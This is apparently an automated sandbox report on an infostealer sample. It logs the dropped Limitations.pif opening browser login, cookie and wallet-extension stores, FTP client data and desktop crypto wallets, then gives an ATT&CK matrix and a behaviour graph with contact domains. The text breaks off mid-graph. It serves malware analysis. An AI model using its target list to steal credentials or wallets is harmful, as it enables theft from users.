    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\506033\Limitations.pifDirectory queried: number of queries: 1001

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid Accounts21
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    2
    OS Credential Dumping
    1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    32
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    2
    Obfuscated Files or Information
    111
    Input Capture
    24
    File and Directory Discovery
    Remote Desktop Protocol31
    Data from Local System
    11
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
    Process Injection
    1
    DLL Side-Loading
    Security Account Manager47
    System Information Discovery
    SMB/Windows Admin Shares111
    Input Capture
    3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Masquerading
    NTDS34
    Security Software Discovery
    Distributed Component Object Model1
    Clipboard Data
    24
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
    Virtualization/Sandbox Evasion
    LSA Secrets3
    Process Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Access Token Manipulation
    Cached Domain Credentials111
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Process Injection
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545453 Sample: Set-up.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 82 goalyfeastz.site 2->82 84 servicedny.site 2->84 86 3 other IPs or domains 2->86 96 Suricata IDS alerts for network traffic 2->96 98 Antivirus detection for dropped file 2->98 100 Multi AV Scanner detection for dropped file 2->100 102 4 other signatures 2->102 11 Set-up.exe 19 2->11         started        signatures3 process4 file5 66 C:\Users\user\AppData\Local\Temp\Warren, data 11->66 dropped 68 C:\Users\user\AppData\Local\Temp\Towers, data 11->68 dropped 70 C:\Users\user\AppData\Local\Temp\Lil, data 11->70 dropped 72 4 other malicious files 11->72 dropped 118 Writes many files with high entropy 11->118 15 cmd.exe 3 11->15         started        signatures6 process7 file8 80 C:\Users\user\AppData\...\Limitations.pif, PE32 15->80 dropped 92 Drops PE files with a suspicious file extension 15->92 94 Writes many files with high entropy 15->94 19 Limitations.pif 1 15->19         started        24 cmd.exe 2 15->24         started        26 conhost.exe 15->26         started        28 7 other processes 15->28 signatures9 process10 dnsIp11 88 goalyfeastz.site 172.67.145.203, 443, 49985, 49986 CLOUDFLARENETUS United States 19->88 90 147.45.47.81, 49995, 80 FREE-NET-ASFREEnetEU Russian Federation 19->90 50 C:\Users\...\X0JA3EDV7BU5B3IH21ST0OE852AR.exe, PE32 19->50 dropped 106 Query firmware table information (likely to detect VMs) 19->106 108 Tries to harvest and steal ftp login credentials 19->108 110 Tries to harvest and steal browser information (history, passwords, etc) 19->110 112 2 other signatures 19->112 30 X0JA3EDV7BU5B3IH21ST0OE852AR.exe 8 19->30         started        52 C:\Users\user\AppData\Local\Temp\506033\W, data 24->52 dropped file12 signatures13 process14 file15 74 C:\Users\user\AppData\Local\Temp\...\file.bin, Zip 30->74 dropped 76 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 30->76 dropped 78 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 30->78 dropped 120 